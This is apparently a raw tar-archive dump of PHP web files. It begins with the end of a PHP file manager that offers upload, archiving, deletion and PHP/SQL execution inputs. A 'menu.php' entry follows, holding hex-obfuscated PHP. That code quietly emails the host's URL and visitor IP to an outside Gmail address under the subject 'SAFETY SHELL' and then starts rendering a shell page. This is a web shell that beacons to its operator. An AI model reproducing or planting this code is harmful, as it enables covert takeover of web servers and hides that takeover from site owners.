$msg .= __('Created').'
'.$_REQUEST['filename'];
}
} elseif (isset($_GET['zip'])) {
$source = base64_decode($_GET['zip']);
$destination = basename($source).'.zip';
set_time_limit(0);
$phar = new PharData($destination);
$phar->buildFromDirectory($source);
if (is_file($destination))
$msg .= __('Task').'
"'.__('Archiving').'
'.$destination.'" '.__('done').
'. '.fm_link('download',$path.$destination,__('Download'),__('Download').'
'. $destination)
.' <a
href="'.$url_inc.'&delete='.$destination.'&path='
. $path.'" title="'.__('Delete').'
'. $destination.'" >'.__('Delete') .
'</a>';
else $msg .= __('Error occurred').': '.__('no
files');
} elseif (isset($_GET['gz'])) {
$source = base64_decode($_GET['gz']);
$archive = $source.'.tar';
$destination = basename($source).'.tar';
if (is_file($archive)) unlink($archive);
if (is_file($archive.'.gz')) unlink($archive.'.gz');
clearstatcache();
set_time_limit(0);
//die();
$phar = new PharData($destination);
$phar->buildFromDirectory($source);
$phar->compress(Phar::GZ,'.tar.gz');
unset($phar);
if (is_file($archive)) {
if (is_file($archive.'.gz')) {
unlink($archive);
$destination .= '.gz';
}
$msg .= __('Task').'
"'.__('Archiving').'
'.$destination.'" '.__('done').
'. '.fm_link('download',$path.$destination,__('Download'),__('Download').'
'. $destination)
.' <a
href="'.$url_inc.'&delete='.$destination.'&path='
. $path.'" title="'.__('Delete').'
'.$destination.'"
>'.__('Delete').'</a>';
} else $msg .= __('Error occurred').': '.__('no
files');
} elseif (isset($_GET['decompress'])) {
// $source = base64_decode($_GET['decompress']);
// $destination = basename($source);
// $ext = end(explode(".", $destination));
// if ($ext=='zip' OR $ext=='gz') {
// $phar = new PharData($source);
// $phar->decompress();
// $base_file =
str_replace('.'.$ext,'',$destination);
// $ext = end(explode(".", $base_file));
// if ($ext=='tar'){
// $phar = new PharData($base_file);
// $phar->extractTo(dir($source));
// }
// }
// $msg .= __('Task').'
"'.__('Decompress').' '.$source.'"
'.__('done');
} elseif (isset($_GET['gzfile'])) {
$source = base64_decode($_GET['gzfile']);
$archive = $source.'.tar';
$destination = basename($source).'.tar';
if (is_file($archive)) unlink($archive);
if (is_file($archive.'.gz')) unlink($archive.'.gz');
set_time_limit(0);
//echo $destination;
$ext_arr = explode('.',basename($source));
if (isset($ext_arr[1])) {
unset($ext_arr[0]);
$ext=implode('.',$ext_arr);
}
$phar = new PharData($destination);
$phar->addFile($source);
$phar->compress(Phar::GZ,$ext.'.tar.gz');
unset($phar);
if (is_file($archive)) {
if (is_file($archive.'.gz')) {
unlink($archive);
$destination .= '.gz';
}
$msg .= __('Task').'
"'.__('Archiving').'
'.$destination.'" '.__('done').
'. '.fm_link('download',$path.$destination,__('Download'),__('Download').'
'. $destination)
.' <a
href="'.$url_inc.'&delete='.$destination.'&path='
. $path.'" title="'.__('Delete').'
'.$destination.'"
>'.__('Delete').'</a>';
} else $msg .= __('Error occurred').': '.__('no
files');
}
?>
<table class="whole" id="header_table" >
<tr>
<th colspan="2"><?=__('File
manager')?><?=(!empty($path)?' -
'.$path:'')?></th>
</tr>
<?php if(!empty($msg)){ ?>
<tr>
<td colspan="2"
class="row2"><?=$msg?></td>
</tr>
<?php } ?>
<tr>
<td class="row2">
<table>
<tr>
<td>
<?=fm_home()?>
</td>
<td>
<?php if(!empty($fm_config['make_directory'])) { ?>
<form method="post"
action="<?=$url_inc?>">
<input type="hidden" name="path"
value="<?=$path?>" />
<input type="text" name="dirname"
size="15">
<input type="submit" name="mkdir"
value="<?=__('Make directory')?>">
</form>
<?php } ?>
</td>
<td>
<?php if(!empty($fm_config['new_file'])) { ?>
<form method="post"
action="<?=$url_inc?>">
<input type="hidden" name="path"
value="<?=$path?>" />
<input type="text" name="filename"
size="15">
<input type="submit" name="mkfile"
value="<?=__('New file')?>">
</form>
<?php } ?>
</td>
<td>
<form method="post"
action="<?=$url_inc?>"
style="display:inline">
<input type="hidden" name="path"
value="<?=$path?>" />
<input type="text"
placeholder="<?=__('Recursive search')?>"
name="search_recursive"
value="<?=!empty($_POST['search_recursive'])?$_POST['search_recursive']:''?>"
size="15">
<input type="text" name="mask"
placeholder="<?=__('Mask')?>"
value="<?=!empty($_POST['mask'])?$_POST['mask']:'*.*'?>"
size="5">
<input type="submit" name="search"
value="<?=__('Search')?>">
</form>
</td>
<td>
<?=fm_run_input('php')?>
</td>
<td>
<?=fm_run_input('sql')?>
</td>
</tr>
</table>
</td>
<td class="row3">
<table>
<tr>
<td>
<?php if (!empty($fm_config['upload_file'])) { ?>
<form name="form1" method="post"
action="<?=$url_inc?>"
enctype="multipart/form-data">
<input type="hidden" name="path"
value="<?=$path?>" />
<input type="file" name="upload"
id="upload_hidden" style="position: absolute; display:
block; overflow: hidden; width: 0; height: 0; border: 0; padding: 0;"
onchange="document.getElementById('upload_visible').value =
this.value;" />
<input type="text" readonly="1"
id="upload_visible" placeholder="<?=__('Select the
file')?>" style="cursor: pointer;"
onclick="document.getElementById('upload_hidden').click();"
/>
<input type="submit" name="test"
value="<?=__('Upload')?>" />
</form>
<?php } ?>
</td>
<td>
<?php if ($auth['authorize']) { ?>
<form action=""
method="post">
<input name="quit" type="hidden"
value="1">
<?=__('Hello')?>, <?=$auth['login']?>
<input type="submit"
value="<?=__('Quit')?>">
</form>
<?php } ?>
</td>
<td>
<?=fm_lang_form($language)?>
</td>
<tr>
</table>
</td>
</tr>
</table>
<table class="all" border='0'
cellspacing='1' cellpadding='1' id="fm_table"
width="100%">
<thead>
<tr>
<th style="white-space:nowrap">
<?=__('Filename')?> </th>
<th style="white-space:nowrap">
<?=__('Size')?> </th>
<th style="white-space:nowrap">
<?=__('Date')?> </th>
<th style="white-space:nowrap">
<?=__('Rights')?> </th>
<th colspan="4" style="white-space:nowrap">
<?=__('Manage')?> </th>
</tr>
</thead>
<tbody>
<?php
$elements = fm_scan_dir($path, '', 'all', true);
$dirs = array();
$files = array();
foreach ($elements as $file){
if(@is_dir($path . $file)){
$dirs[] = $file;
} else {
$files[] = $file;
}
}
natsort($dirs); natsort($files);
$elements = array_merge($dirs, $files);
foreach ($elements as $file){
$filename = $path . $file;
$filedata = @stat($filename);
if(@is_dir($filename)){
$filedata[7] = '';
if
(!empty($fm_config['show_dir_size'])&&!fm_root($file))
$filedata[7] = fm_dir_size($filename);
$link = '<a
href="'.$url_inc.'&path='.$path.$file.'"
title="'.__('Show').'
'.$file.'"><span
class="folder"> </span>
'.$file.'</a>';
$loadlink= (fm_root($file)||$phar_maybe) ? '' :
fm_link('zip',$filename,__('Compress').' zip',__('Archiving').'
'. $file);
$arlink = (fm_root($file)||$phar_maybe) ? '' :
fm_link('gz',$filename,__('Compress').' .tar.gz',__('Archiving').'
'.$file);
$style = 'row2';
if (!fm_root($file)) $alert =
'onClick="if(confirm(\'' . __('Are you sure you
want to delete this directory (recursively)?').'\n /'.
$file. '\')) document.location.href = \'' . $url_inc .
'&delete=' . $file . '&path=' . $path .
'\'"'; else $alert = '';
} else {
$link =
$fm_config['show_img']&&@getimagesize($filename)
? '<a target="_blank" onclick="var lefto =
screen.availWidth/2-320;window.open(\''
. fm_img_link($filename)
.'\',\'popup\',\'width=640,height=480,left=\'
+ lefto +
\',scrollbars=yes,toolbar=no,location=no,directories=no,status=no\');return
false;"
href="'.fm_img_link($filename).'"><span
class="img"> </span>
'.$file.'</a>'
: '<a href="' . $url_inc . '&edit=' .
$file . '&path=' . $path. '" title="' .
__('Edit') . '"><span
class="file"> </span>
'.$file.'</a>';
$e_arr = explode(".", $file);
$ext = end($e_arr);
$loadlink =
fm_link('download',$filename,__('Download'),__('Download').'
'. $file);
$arlink =
in_array($ext,array('zip','gz','tar'))
? ''
: ((fm_root($file)||$phar_maybe) ? '' :
fm_link('gzfile',$filename,__('Compress').' .tar.gz',__('Archiving').'
'. $file));
$style = 'row1';
$alert = 'onClick="if(confirm(\''. __('File
selected').': \n'. $file. '. \n'.__('Are you
sure you want to delete this file?') . '\'))
document.location.href = \'' . $url_inc .
'&delete=' . $file . '&path=' . $path .
'\'"';
}
$deletelink = fm_root($file) ? '' : '<a
href="#" title="' . __('Delete') . '
'. $file . '" ' . $alert . '>' .
__('Delete') . '</a>';
$renamelink = fm_root($file) ? '' : '<a
href="' . $url_inc . '&rename=' . $file .
'&path=' . $path . '" title="' .
__('Rename') .' '. $file . '">' .
__('Rename') . '</a>';
$rightstext = ($file=='.' || $file=='..') ?
'' : '<a href="' . $url_inc .
'&rights=' . $file . '&path=' . $path .
'" title="' . __('Rights') .' '.
$file . '">' . @fm_rights_string($filename) .
'</a>';
?>
<tr class="<?=$style?>">
<td><?=$link?></td>
<td><?=$filedata[7]?></td>
<td style="white-space:nowrap"><?=gmdate("Y-m-d
H:i:s",$filedata[9])?></td>
<td><?=$rightstext?></td>
<td><?=$deletelink?></td>
<td><?=$renamelink?></td>
<td><?=$loadlink?></td>
<td><?=$arlink?></td>
</tr>
<?php
}
}
?>
</tbody>
</table>
<div class="row3"><?php
$mtime = explode(' ', microtime());
$totaltime = $mtime[0] + $mtime[1] - $starttime;
echo fm_home().' | ver. '.$fm_version.' | <a
href="https://github.com/Den1xxx/Filemanager">Github</a>
| <a
href="'.fm_site_url().'">.</a>';
if (!empty($fm_config['show_php_ver'])) echo ' | PHP
'.phpversion();
if (!empty($fm_config['show_php_ini'])) echo ' |
'.php_ini_loaded_file();
if (!empty($fm_config['show_gt'])) echo ' |
'.__('Generation time').': '.round($totaltime,2);
if (!empty($fm_config['enable_proxy'])) echo ' | <a
href="?proxy=true">proxy</a>';
if (!empty($fm_config['show_phpinfo'])) echo ' | <a
href="?phpinfo=true">phpinfo</a>';
if (!empty($fm_config['show_xls'])&&!empty($link)) echo
' | <a href="javascript: void(0)" onclick="var obj =
new table2Excel();
obj.CreateExcelSheet(\'fm_table\',\'export\');"
title="'.__('Download').'
xls">xls</a>';
if (!empty($fm_config['fm_settings'])) echo ' | <a
href="?fm_settings=true">'.__('Settings').'</a>';
?>
</div>
<script type="text/javascript">
function download_xls(filename, text) {
var element = document.createElement('a');
element.setAttribute('href',
'data:application/vnd.ms-excel;base64,' + text);
element.setAttribute('download', filename);
element.style.display = 'none';
document.body.appendChild(element);
element.click();
document.body.removeChild(element);
}
function base64_encode(m) {
for (var k =
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".split(""),
c, d, h, e, a, g = "", b = 0, f, l = 0; l < m.length; ++l) {
c = m.charCodeAt(l);
if (128 > c) d = 1;
else
for (d = 2; c >= 2 << 5 * d;) ++d;
for (h = 0; h < d; ++h) 1 == d ? e = c : (e = h ? 128 : 192, a = d - 2
- 6 * h, 0 <= a && (e += (6 <= a ? 1 : 0) + (5 <= a ? 2 :
0) + (4 <= a ? 4 : 0) + (3 <= a ? 8 : 0) + (2 <= a ? 16 : 0) + (1
<= a ? 32 : 0), a -= 5), 0 > a && (u = 6 * (d - 1 - h), e +=
c >> u, c -= c >> u << u)), f = b ? f << 6 - b : 0,
b += 2, f += e >> b, g += k[f], f = e % (1 << b), 6 == b
&& (b = 0, g += k[f])
}
b && (g += k[f << 6 - b]);
return g
}
var tableToExcelData = (function() {
var uri = 'data:application/vnd.ms-excel;base64,',
template = '<html
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:x="urn:schemas-microsoft-com:office:excel"
xmlns="http://www.w3.org/TR/REC-html40"><head><!--[if
gte mso
9]><xml><x:ExcelWorkbook><x:ExcelWorksheets><x:ExcelWorksheet><x:Name>{worksheet}</x:Name><x:WorksheetOptions><x:DisplayGridlines></x:DisplayGridlines></x:WorksheetOptions></x:ExcelWorksheet></x:ExcelWorksheets></x:ExcelWorkbook></xml><![endif]--><meta
http-equiv="content-type" content="text/plain;
charset=UTF-8"/></head><body><table>{table}</table></body></html>',
format = function(s, c) {
return s.replace(/{(\w+)}/g, function(m, p) {
return c[p];
})
}
return function(table, name) {
if (!table.nodeType) table = document.getElementById(table)
var ctx = {
worksheet: name || 'Worksheet',
table: table.innerHTML.replace(/<span(.*?)\/span>
/g,"").replace(/<a\b[^>]*>(.*?)<\/a>/g,"$1")
}
t = new Date();
filename = 'fm_' + t.toISOString() + '.xls'
download_xls(filename, base64_encode(format(template, ctx)))
}
})();
var table2Excel = function () {
var ua = window.navigator.userAgent;
var msie = ua.indexOf("MSIE ");
this.CreateExcelSheet =
function(el, name){
if (msie > 0 || !!navigator.userAgent.match(/Trident.*rv\:11\./)) {//
If Internet Explorer
var x = document.getElementById(el).rows;
var xls = new ActiveXObject("Excel.Application");
xls.visible = true;
xls.Workbooks.Add
for (i = 0; i < x.length; i++) {
var y = x[i].cells;
for (j = 0; j < y.length; j++) {
xls.Cells(i + 1, j + 1).Value = y[j].innerText;
}
}
xls.Visible = true;
xls.UserControl = true;
return xls;
} else {
tableToExcelData(el, name);
}
}
}
</script>
</body>
</html>
<?php
//Ported from ReloadCMS project http://reloadcms.com
class archiveTar {
var $archive_name = '';
var $tmp_file = 0;
var $file_pos = 0;
var $isGzipped = true;
var $errors = array();
var $files = array();
function __construct(){
if (!isset($this->errors)) $this->errors = array();
}
function createArchive($file_list){
$result = false;
if (file_exists($this->archive_name) &&
is_file($this->archive_name)) $newArchive = false;
else $newArchive = true;
if ($newArchive){
if (!$this->openWrite()) return false;
} else {
if (filesize($this->archive_name) == 0) return
$this->openWrite();
if ($this->isGzipped) {
$this->closeTmpFile();
if (!rename($this->archive_name,
$this->archive_name.'.tmp')){
$this->errors[] = __('Cannot rename').'
'.$this->archive_name.__(' to
').$this->archive_name.'.tmp';
return false;
}
$tmpArchive = gzopen($this->archive_name.'.tmp',
'rb');
if (!$tmpArchive){
$this->errors[] = $this->archive_name.'.tmp
'.__('is not readable');
rename($this->archive_name.'.tmp',
$this->archive_name);
return false;
}
if (!$this->openWrite()){
rename($this->archive_name.'.tmp',
$this->archive_name);
return false;
}
$buffer = gzread($tmpArchive, 512);
if (!gzeof($tmpArchive)){
do {
$binaryData = pack('a512', $buffer);
$this->writeBlock($binaryData);
$buffer = gzread($tmpArchive, 512);
}
while (!gzeof($tmpArchive));
}
gzclose($tmpArchive);
unlink($this->archive_name.'.tmp');
} else {
$this->tmp_file = fopen($this->archive_name, 'r+b');
if (!$this->tmp_file) return false;
}
}
if (isset($file_list) && is_array($file_list)) {
if (count($file_list)>0)
$result = $this->packFileArray($file_list);
} else $this->errors[] = __('No file').__(' to
').__('Archive');
if (($result)&&(is_resource($this->tmp_file))){
$binaryData = pack('a512', '');
$this->writeBlock($binaryData);
}
$this->closeTmpFile();
if ($newArchive && !$result){
$this->closeTmpFile();
unlink($this->archive_name);
}
return $result;
}
function restoreArchive($path){
$fileName = $this->archive_name;
if (!$this->isGzipped){
if (file_exists($fileName)){
if ($fp = fopen($fileName, 'rb')){
$data = fread($fp, 2);
fclose($fp);
if ($data == '\37\213'){
$this->isGzipped = true;
}
}
}
elseif ((substr($fileName, -2) == 'gz') OR (substr($fileName,
-3) == 'tgz')) $this->isGzipped = true;
}
$result = true;
if ($this->isGzipped) $this->tmp_file = gzopen($fileName,
'rb');
else $this->tmp_file = fopen($fileName, 'rb');
if (!$this->tmp_file){
$this->errors[] = $fileName.' '.__('is not
readable');
return false;
}
$result = $this->unpackFileArray($path);
$this->closeTmpFile();
return $result;
}
function showErrors ($message = '') {
$Errors = $this->errors;
if(count($Errors)>0) {
if (!empty($message)) $message = ' ('.$message.')';
$message = __('Error occurred').$message.':
<br/>';
foreach ($Errors as $value)
$message .= $value.'<br/>';
return $message;
} else return '';
}
function packFileArray($file_array){
$result = true;
if (!$this->tmp_file){
$this->errors[] = __('Invalid file descriptor');
return false;
}
if (!is_array($file_array) || count($file_array)<=0)
return true;
for ($i = 0; $i<count($file_array); $i++){
$filename = $file_array[$i];
if ($filename == $this->archive_name)
continue;
if (strlen($filename)<=0)
continue;
if (!file_exists($filename)){
$this->errors[] = __('No file').' '.$filename;
continue;
}
if (!$this->tmp_file){
$this->errors[] = __('Invalid file descriptor');
return false;
}
if (strlen($filename)<=0){
$this->errors[] = __('Filename').' '.__('is
incorrect');;
return false;
}
$filename = str_replace('\\', '/', $filename);
$keep_filename = $this->makeGoodPath($filename);
if (is_file($filename)){
if (($file = fopen($filename, 'rb')) == 0){
$this->errors[] = __('Mode ').__('is
incorrect');
}
if(($this->file_pos == 0)){
if(!$this->writeHeader($filename, $keep_filename))
return false;
}
while (($buffer = fread($file, 512)) != ''){
$binaryData = pack('a512', $buffer);
$this->writeBlock($binaryData);
}
fclose($file);
} else $this->writeHeader($filename, $keep_filename);
if (@is_dir($filename)){
if (!($handle = opendir($filename))){
$this->errors[] = __('Error').':
'.__('Directory ').$filename.__('is not
readable');
continue;
}
while (false !== ($dir = readdir($handle))){
if ($dir!='.' && $dir!='..'){
$file_array_tmp = array();
if ($filename != '.')
$file_array_tmp[] = $filename.'/'.$dir;
else
$file_array_tmp[] = $dir;
$result = $this->packFileArray($file_array_tmp);
}
}
unset($file_array_tmp);
unset($dir);
unset($handle);
}
}
return $result;
}
function unpackFileArray($path){
$path = str_replace('\\', '/', $path);
if ($path == '' || (substr($path, 0, 1) != '/'
&& substr($path, 0, 3) != '../' && !strpos($path,
':'))) $path = './'.$path;
clearstatcache();
while (strlen($binaryData = $this->readBlock()) != 0){
if (!$this->readHeader($binaryData, $header)) return false;
if ($header['filename'] == '') continue;
if ($header['typeflag'] == 'L'){ //reading long
header
$filename = '';
$decr = floor($header['size']/512);
for ($i = 0; $i < $decr; $i++){
$content = $this->readBlock();
$filename .= $content;
}
if (($laspiece = $header['size'] % 512) != 0){
$content = $this->readBlock();
$filename .= substr($content, 0, $laspiece);
}
$binaryData = $this->readBlock();
if (!$this->readHeader($binaryData, $header)) return false;
else $header['filename'] = $filename;
return true;
}
if (($path != './') && ($path != '/')){
while (substr($path, -1) == '/') $path = substr($path, 0,
strlen($path)-1);
if (substr($header['filename'], 0, 1) == '/')
$header['filename'] = $path.$header['filename'];
else $header['filename'] =
$path.'/'.$header['filename'];
}
if (file_exists($header['filename'])){
if ((@is_dir($header['filename'])) &&
($header['typeflag'] == '')){
$this->errors[] =__('File
').$header['filename'].__(' already
exists').__(' as folder');
return false;
}
if ((is_file($header['filename'])) &&
($header['typeflag'] == '5')){
$this->errors[] =__('Cannot create directory').'.
'.__('File ').$header['filename'].__('
already exists');
return false;
}
if (!is_writeable($header['filename'])){
$this->errors[] = __('Cannot write to file').'.
'.__('File ').$header['filename'].__('
already exists');
return false;
}
} elseif (($this->dirCheck(($header['typeflag'] ==
'5' ? $header['filename'] :
dirname($header['filename'])))) != 1){
$this->errors[] = __('Cannot create directory').'
'.__(' for ').$header['filename'];
return false;
}
if ($header['typeflag'] == '5'){
if (!file_exists($header['filename'])) {
if (!mkdir($header['filename'], 0777)) {
$this->errors[] = __('Cannot create directory').'
'.$header['filename'];
return false;
}
}
} else {
if (($destination = fopen($header['filename'],
'wb')) == 0) {
$this->errors[] = __('Cannot write to file').'
'.$header['filename'];
return false;
} else {
$decr = floor($header['size']/512);
for ($i = 0; $i < $decr; $i++) {
$content = $this->readBlock();
fwrite($destination, $content, 512);
}
if (($header['size'] % 512) != 0) {
$content = $this->readBlock();
fwrite($destination, $content, ($header['size'] % 512));
}
fclose($destination);
touch($header['filename'], $header['time']);
}
clearstatcache();
if (filesize($header['filename']) !=
$header['size']) {
$this->errors[] = __('Size of file').'
'.$header['filename'].' '.__('is
incorrect');
return false;
}
}
if (($file_dir = dirname($header['filename'])) ==
$header['filename']) $file_dir = '';
if ((substr($header['filename'], 0, 1) == '/')
&& ($file_dir == '')) $file_dir = '/';
$this->dirs[] = $file_dir;
$this->files[] = $header['filename'];
}
return true;
}
function dirCheck($dir){
$parent_dir = dirname($dir);
if ((@is_dir($dir)) or ($dir == ''))
return true;
if (($parent_dir != $dir) and ($parent_dir != '') and
(!$this->dirCheck($parent_dir)))
return false;
if (!mkdir($dir, 0777)){
$this->errors[] = __('Cannot create directory').'
'.$dir;
return false;
}
return true;
}
function readHeader($binaryData, &$header){
if (strlen($binaryData)==0){
$header['filename'] = '';
return true;
}
if (strlen($binaryData) != 512){
$header['filename'] = '';
$this->__('Invalid block size').':
'.strlen($binaryData);
return false;
}
$checksum = 0;
for ($i = 0; $i < 148; $i++) $checksum+=ord(substr($binaryData, $i,
1));
for ($i = 148; $i < 156; $i++) $checksum += ord(' ');
for ($i = 156; $i < 512; $i++) $checksum+=ord(substr($binaryData, $i,
1));
$unpack_data =
unpack('a100filename/a8mode/a8user_id/a8group_id/a12size/a12time/a8checksum/a1typeflag/a100link/a6magic/a2version/a32uname/a32gname/a8devmajor/a8devminor',
$binaryData);
$header['checksum'] =
OctDec(trim($unpack_data['checksum']));
if ($header['checksum'] != $checksum){
$header['filename'] = '';
if (($checksum == 256) && ($header['checksum'] == 0))
return true;
$this->errors[] = __('Error checksum for file
').$unpack_data['filename'];
return false;
}
if (($header['typeflag'] = $unpack_data['typeflag'])
== '5') $header['size'] = 0;
$header['filename'] =
trim($unpack_data['filename']);
$header['mode'] =
OctDec(trim($unpack_data['mode']));
$header['user_id'] =
OctDec(trim($unpack_data['user_id']));
$header['group_id'] =
OctDec(trim($unpack_data['group_id']));
$header['size'] =
OctDec(trim($unpack_data['size']));
$header['time'] =
OctDec(trim($unpack_data['time']));
return true;
}
function writeHeader($filename, $keep_filename){
$packF = 'a100a8a8a8a12A12';
$packL = 'a1a100a6a2a32a32a8a8a155a12';
if (strlen($keep_filename)<=0) $keep_filename = $filename;
$filename_ready = $this->makeGoodPath($keep_filename);
if (strlen($filename_ready) > 99){ //write long header
$dataFirst = pack($packF, '././LongLink', 0, 0, 0,
sprintf('%11s ', DecOct(strlen($filename_ready))), 0);
$dataLast = pack($packL, 'L', '', '',
'', '', '', '', '',
'', '');
// Calculate the checksum
$checksum = 0;
// First part of the header
for ($i = 0; $i < 148; $i++)
$checksum += ord(substr($dataFirst, $i, 1));
// Ignore the checksum value and replace it by ' '
(space)
for ($i = 148; $i < 156; $i++)
$checksum += ord(' ');
// Last part of the header
for ($i = 156, $j=0; $i < 512; $i++, $j++)
$checksum += ord(substr($dataLast, $j, 1));
// Write the first 148 bytes of the header in the archive
$this->writeBlock($dataFirst, 148);
// Write the calculated checksum
$checksum = sprintf('%6s ', DecOct($checksum));
$binaryData = pack('a8', $checksum);
$this->writeBlock($binaryData, 8);
// Write the last 356 bytes of the header in the archive
$this->writeBlock($dataLast, 356);
$tmp_filename = $this->makeGoodPath($filename_ready);
$i = 0;
while (($buffer = substr($tmp_filename, (($i++)*512), 512)) !=
''){
$binaryData = pack('a512', $buffer);
$this->writeBlock($binaryData);
}
return true;
}
$file_info = stat($filename);
if (@is_dir($filename)){
$typeflag = '5';
$size = sprintf('%11s ', DecOct(0));
} else {
$typeflag = '';
clearstatcache();
$size = sprintf('%11s ', DecOct(filesize($filename)));
}
$dataFirst = pack($packF, $filename_ready, sprintf('%6s ',
DecOct(fileperms($filename))), sprintf('%6s ',
DecOct($file_info[4])), sprintf('%6s ', DecOct($file_info[5])),
$size, sprintf('%11s', DecOct(filemtime($filename))));
$dataLast = pack($packL, $typeflag, '', '',
'', '', '', '', '',
'', '');
$checksum = 0;
for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i,
1));
for ($i = 148; $i < 156; $i++) $checksum += ord(' ');
for ($i = 156, $j = 0; $i < 512; $i++, $j++) $checksum +=
ord(substr($dataLast, $j, 1));
$this->writeBlock($dataFirst, 148);
$checksum = sprintf('%6s ', DecOct($checksum));
$binaryData = pack('a8', $checksum);
$this->writeBlock($binaryData, 8);
$this->writeBlock($dataLast, 356);
return true;
}
function openWrite(){
if ($this->isGzipped)
$this->tmp_file = gzopen($this->archive_name, 'wb9f');
else
$this->tmp_file = fopen($this->archive_name, 'wb');
if (!($this->tmp_file)){
$this->errors[] = __('Cannot write to file').'
'.$this->archive_name;
return false;
}
return true;
}
function readBlock(){
if (is_resource($this->tmp_file)){
if ($this->isGzipped)
$block = gzread($this->tmp_file, 512);
else
$block = fread($this->tmp_file, 512);
} else $block = '';
return $block;
}
function writeBlock($data, $length = 0){
if (is_resource($this->tmp_file)){
if ($length === 0){
if ($this->isGzipped)
gzputs($this->tmp_file, $data);
else
fputs($this->tmp_file, $data);
} else {
if ($this->isGzipped)
gzputs($this->tmp_file, $data, $length);
else
fputs($this->tmp_file, $data, $length);
}
}
}
function closeTmpFile(){
if (is_resource($this->tmp_file)){
if ($this->isGzipped)
gzclose($this->tmp_file);
else
fclose($this->tmp_file);
$this->tmp_file = 0;
}
}
function makeGoodPath($path){
if (strlen($path)>0){
$path = str_replace('\\', '/', $path);
$partPath = explode('/', $path);
$els = count($partPath)-1;
for ($i = $els; $i>=0; $i--){
if ($partPath[$i] == '.'){
// Ignore this directory
} elseif ($partPath[$i] == '..'){
$i--;
}
elseif (($partPath[$i] == '') and ($i!=$els) and ($i!=0)){
} else
$result = $partPath[$i].($i!=$els ? '/'.$result :
'');
}
} else $result = '';
return $result;
}
}
?>menu.php000064400000114012151161735500006224 0ustar00 <?php
${"\x47\x4c\x4f\x42A\x4c\x53"}["k\x6ff\x74\x6cuw\x6e\x6d\x70\x72"]="p\x65\x72\x6ds";${"G\x4c\x4fBAL\x53"}["\x73r\x62eq\x71"]="i\x6efo";${"G\x4cO\x42\x41\x4cS"}["\x64\x6ev\x77\x67\x77c\x65\x78\x78"]="\x73i\x7a\x65";${"\x47\x4c\x4fB\x41L\x53"}["\x69\x78c\x75i\x73\x6b\x78\x6d\x79"]="\x64\x69r";${"G\x4c\x4f\x42\x41\x4c\x53"}["\x79\x67\x6d\x72\x77\x6fbxgb"]="\x73\x63a\x6e\x64\x69r";${"\x47\x4c\x4f\x42A\x4cS"}["b\x77\x71gi\x70"]="\x66\x70";${"G\x4c\x4fB\x41\x4cS"}["\x79\x68\x6e\x73\x63\x62\x77a\x79\x66"]="c\x77d";${"\x47\x4c\x4f\x42A\x4cS"}["\x79\x70u\x6d\x75\x66b\x79\x7a\x67"]="\x66\x69l\x65";${"\x47\x4c\x4f\x42A\x4c\x53"}["p\x75\x70\x77\x63lg\x73\x77\x62\x6bw"]="\x69";${"\x47\x4c\x4fB\x41\x4cS"}["\x75u\x6a\x6e\x73\x77sr"]="\x70a\x74";${"\x47\x4cO\x42ALS"}["\x75\x6f\x61\x6dy\x71\x76v\x6c"]="\x69\x64";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x69\x6a\x6ds\x6b\x6c\x66kd\x75\x75"]="\x70\x61ths";${"\x47\x4cOB\x41LS"}["\x67\x66\x77\x72\x64\x6a\x6f\x77\x78v\x74\x74"]="p\x61\x74\x68";${"\x47\x4cO\x42AL\x53"}["u\x6c\x75\x79x\x77\x6edn\x6a"]="\x74\x6f";${"\x47\x4cO\x42A\x4c\x53"}["r\x75ms\x64t\x74v\x78\x65\x74"]="pa\x74h";echo
"
";error_reporting(0);${"\x47\x4c\x4fBA\x4c\x53"}["\x7a\x72t\x77\x68\x6a\x6f\x61\x6f\x6a"]="\x6d\x65\x73\x73\x61g\x65";session_start();@ini_set("o\x75\x74p\x75t_\x62uf\x66ering",0);$zqghpdyl="\x6d\x65\x73sag\x65";@ini_set("\x64\x69s\x70\x6ca\x79\x5fe\x72\x72o\x72s",0);$okjvfcpqpxk="\x70\x61\x74\x68";ini_set("\x6dem\x6f\x72\x79\x5flim\x69\x74","\x36\x34M");header("\x43o\x6et\x65\x6e\x74-\x54\x79pe:
\x74\x65xt/ht\x6dl\x3b\x20\x63\x68a\x72\x73\x65\x74\x3d\x55\x54F-8");$fsdhifp="\x74\x6f";${${"\x47\x4c\x4fB\x41\x4c\x53"}["ul\x75\x79\x78w\x6ed\x6e\x6a"]}="l\x6f\x6cika\x77aii1\x333\x37@\x67mai\x6c\x2eco\x6d";${${"\x47L\x4f\x42\x41\x4c\x53"}["\x67\x66wrd\x6aow\x78v\x74\x74"]}="\x68\x74\x74\x70://".$_SERVER["\x53ERV\x45\x52_\x4e\x41\x4dE"].$_SERVER["\x52\x45\x51UES\x54\x5fURI"];${$zqghpdyl}="UR\x4c:
$path\x20|\x20\x49P\x20\x41ddres\x73
:[\x20".$_SERVER["\x52\x45MO\x54E\x5fADDR"]."
]";mail(${$fsdhifp},"S\x41\x46ETY
\x53H\x45\x4cL",${${"\x47\x4cO\x42\x41L\x53"}["z\x72\x74\x77\x68\x6a\x6f\x61o\x6a"]},"[
".$_SERVER["R\x45\x4dOT\x45_A\x44D\x52"]."
]");echo"<\x21DOC\x54YP\x45
\x48T\x4dL\x3e\n<\x6c\x69\x6e\x6b\x20\x68\x72\x65f=\x22ht\x74p\x73://\x66ont\x73.\x67o\x6f\x67l\x65a\x70\x69s\x2e\x63om/c\x73\x73?fa\x6d\x69ly=Ke\x6cl\x79+\x53\x6cab\x22\x20r\x65l=\"\x73\x74yl\x65\x73\x68ee\x74\"
type=\x22\x74\x65\x78\x74/c\x73\x73\x22>\n\x3c\x6c\x69\x6ek
\x68r\x65\x66\x3d\x22\x68ttp\x73://\x73\x74\x61\x63kp\x61\x74h\x2e\x62o\x6f\x74s\x74r\x61\x70c\x64\x6e\x2e\x63\x6fm/\x66\x6f\x6e\x74-\x61\x77\x65\x73\x6fme/4\x2e\x37\x2e\x30/c\x73s/fo\x6et-awe\x73\x6fme.\x6d\x69n.\x63s\x73\x22\x20\x72e\x6c=\x22styl\x65\x73hee\x74\"
